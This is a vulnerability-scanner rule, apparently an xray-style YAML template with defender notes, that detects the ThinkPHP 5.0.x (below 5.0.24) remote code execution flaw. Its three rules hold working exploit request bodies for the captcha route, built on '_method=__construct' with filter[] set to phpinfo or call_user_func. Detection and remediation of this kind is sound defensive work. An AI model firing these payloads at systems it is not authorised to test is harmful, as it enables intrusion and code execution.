漏洞描述
ThinkPHP 5: remote code execution in the 5.0 branch, affecting versions earlier than 5.0.24.
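# Scanner rule that checks whether a host runs a ThinkPHP 5.0.x build affected
# by the remote code execution issue named in `info.description`
# (versions below 5.0.24).
#
# The listing had lost its indentation, which left `request`, `method`, `path`,
# `body` and `expression` repeated as sibling keys at one level. The nesting
# below restores one mapping per rule (r0, r1, r2) and a single top-level
# `expression` that combines them.
#
# Defender notes:
#   - Remediation: upgrade ThinkPHP to 5.0.24 or later, per the version bound
#     in the description.
#   - Log/WAF signal: every probe is a POST to the `s=captcha` route whose form
#     body carries `_method=__construct` together with a `filter[]` parameter.
#     r1 sends the value in mixed case, so match it case-insensitively.
#   - False positives: each rule accepts any HTTP 200 response that contains
#     phpinfo() output. A site that already serves a phpinfo page at this path
#     would match regardless of the POST body, so confirm a hit against the
#     installed framework version.
id: thinkphp-5023-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: dr_set
  severity: critical
  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce

rules:
  # Variant 1: filter[] names phpinfo; also sets server[REQUEST_METHOD].
  r0:
    request:
      method: POST
      path: /?s=captcha&test=-1
      # `|` keeps the trailing newline, so the body is sent with one.
      body: |
        _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
    # Match: HTTP 200 plus phpinfo() markers, including the version table cell.
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  # Variant 2: mixed-case `__ConStruct`, phpinfo reached through call_user_func
  # (presumably to cover targets that filter the lowercase form; not stated on
  # the page).
  r1:
    request:
      method: POST
      path: /?s=captcha&test=-1
      body: |
        _method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo
    # Same match condition as r0.
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
  # Variant 3: as r0, with `method=GET` in upper case and a `get[]` parameter.
  r2:
    request:
      method: POST
      path: /?s=captcha&test=-1
      body: |
        _method=__construct&filter[]=phpinfo&method=GET&get[]=1
    # Same match condition as r0.
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)

# The target is reported as vulnerable if any one variant matches.
expression: r0() || r1() || r2()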